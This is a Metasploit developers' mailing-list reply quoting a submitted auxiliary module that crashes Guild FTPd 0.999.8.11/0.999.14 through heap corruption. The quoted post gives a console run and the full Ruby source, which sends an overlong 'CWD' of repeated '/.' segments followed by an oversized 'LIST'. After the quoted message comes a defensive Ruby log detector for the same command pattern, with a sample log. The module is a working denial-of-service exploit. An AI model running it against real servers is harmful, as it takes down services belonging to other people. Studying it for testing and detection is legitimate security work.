Applied. Thanks!

Best regards,
On Tue, 2008-10-14 at 01:50 -0500, Kris Katterjohn wrote:
> Hey guys,
>
> I've attached a new DoS auxiliary module for Guild FTPd versions 0.999.8.11
> and 0.999.14. It's based on the Python script from yesterday which says it
> works for these versions, but I've only been able to test it on the latter.
>
> This module needs the patch I sent a few minutes ago fixing banner grabbing in
> Exploit::Remote::Ftp.
>
> msf > use dos/windows/ftp/guildftp_cwdlist
> msf auxiliary(guildftp_cwdlist) > set RHOST 192.168.10.2
> RHOST => 192.168.10.2
> msf auxiliary(guildftp_cwdlist) > set FTPUSER test
> FTPUSER => test
> msf auxiliary(guildftp_cwdlist) > set FTPPASS test
> FTPPASS => test
> msf auxiliary(guildftp_cwdlist) > run
> [*] Connecting to FTP server 192.168.10.2:21...
> [*] Connected to target FTP server.
> [*] Authenticating as test with password test...
> [*] Sending password...
> [*] Sending commands...
> [*] Auxiliary module execution completed
>
>
> msf auxiliary(guildftp_cwdlist) > info
>
>        Name: Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
>     Version: 1
>
> Provided by:
>   Kris Katterjohn <[EMAIL PROTECTED]>
>
> Basic options:
>   Name     Current Setting  Required  Description
>   ----     ---------------  --------  -----------
>   FTPPASS  test             yes       Valid FTP password for username
>   FTPUSER  test             yes       Valid FTP username
>   RHOST    192.168.10.2     yes       The target address
>   RPORT    21               yes       The target port
>
> Description:
>   Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable to heap
>   corruption. You need to have a valid login so you can run CWD and
>   LIST.
>
>
> Thanks,
> Kris Katterjohn
>
> plain text document attachment (guildftp_cwdlist.rb)
> require 'msf/core'
>
> class Metasploit3 < Msf::Auxiliary
>
>   include Msf::Exploit::Remote::Ftp
>
>   def initialize(info = {})
>     super(update_info(info,
>       'Name'           => 'Guild FTPd 0.999.8.11/0.999.14 Heap Corruption',
>       'Description'    => %q{
>         Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable
>         to heap corruption. You need to have a valid login
>         so you can run CWD and LIST.
>       },
>       'Author'         => 'Kris Katterjohn <[EMAIL PROTECTED]>',
>       'License'        => MSF_LICENSE,
>       'Version'        => '1',
>       'References'     =>
>         [
>           [ 'URL', 'http://milw0rm.com/exploits/6738']
>         ],
>       'DisclosureDate' => 'Oct 12 2008'))
>
>     # They're required
>     register_options([
>       OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
>       OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
>     ])
>   end
>
>   def run
>     connect_login
>
>     print_status("Sending commands...")
>
>     # We want to try to wait for responses to these
>     raw_send_recv("CWD #{'/.' * 124}\r\n")
>     raw_send_recv("LIST #{'X' * 100}\r\n")
>
>     disconnect
>   end
> end
>
> _______________________________________________
> Framework-Hackers mailing list
> Framework-Hackers@spool.metasploit.com
> http://spool.metasploit.com/mailman/listinfo/framework-hackers
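Defenders can look for the same command sequence in FTP command logs. The Ruby sketch below is an added example, not part of the original message or of Metasploit; the log line format, field names and both thresholds are assumptions, and the sample log lines are constructed.

```ruby
# Added example: flags FTP sessions whose commands match the CWD-then-LIST
# pattern sent by the module above. Log format and thresholds are assumptions.
CWD_DOT_RUN_MIN = 32 # assumed: minimum repeated "/." segments in a CWD argument
LIST_ARG_MIN    = 64 # assumed: minimum LIST argument length in bytes

# Assumed line format: "<timestamp> session=<id> user=<name> <VERB> [argument]"
LINE_RE = /\A(?<ts>\S+) session=(?<sid>\S+) user=(?<user>\S+) (?<verb>[A-Za-z]+)(?: (?<arg>.*))?\z/

# Longest run of consecutive "/." segments in a path argument.
def longest_dot_run(arg)
  arg.scan(%r{(?:/\.)+}).map { |run| run.length / 2 }.max || 0
end

# Returns one finding per session in which an oversized LIST follows a CWD
# whose argument is a long run of "/." segments.
def detect_cwd_list(lines)
  pending = {} # session id => suspicious CWD awaiting a LIST
  findings = []
  lines.each do |line|
    m = LINE_RE.match(line.chomp) or next # skip lines in another format
    sid = m[:sid]
    arg = m[:arg].to_s
    case m[:verb].upcase
    when 'CWD'
      run = longest_dot_run(arg)
      pending[sid] = { ts: m[:ts], dot_run: run } if run >= CWD_DOT_RUN_MIN
    when 'LIST'
      next unless pending.key?(sid) && arg.bytesize >= LIST_ARG_MIN
      cwd = pending.delete(sid)
      findings << { session: sid, user: m[:user], cwd_ts: cwd[:ts],
                    list_ts: m[:ts], dot_run: cwd[:dot_run], list_len: arg.bytesize }
    when 'QUIT'
      pending.delete(sid) # session ended without the follow-up LIST
    end
  end
  findings
end

# Constructed sample log; session 7 mirrors the two commands in the module.
SAMPLE_LOG = [
  "2008-10-14T01:52:08 session=7 user=test CWD /pub",
  "2008-10-14T01:52:09 session=8 user=alice CWD /pub/./docs",
  "2008-10-14T01:52:10 session=7 user=test CWD #{'/.' * 124}",
  "2008-10-14T01:52:10 session=8 user=alice LIST -la",
  "2008-10-14T01:52:11 session=7 user=test LIST #{'X' * 100}"
].freeze

detect_cwd_list(SAMPLE_LOG).each { |f| puts "ALERT #{f}" } if __FILE__ == $PROGRAM_NAME
```

Because the module requires a valid login, each finding carries the authenticated user name, which gives responders an account to review alongside the session.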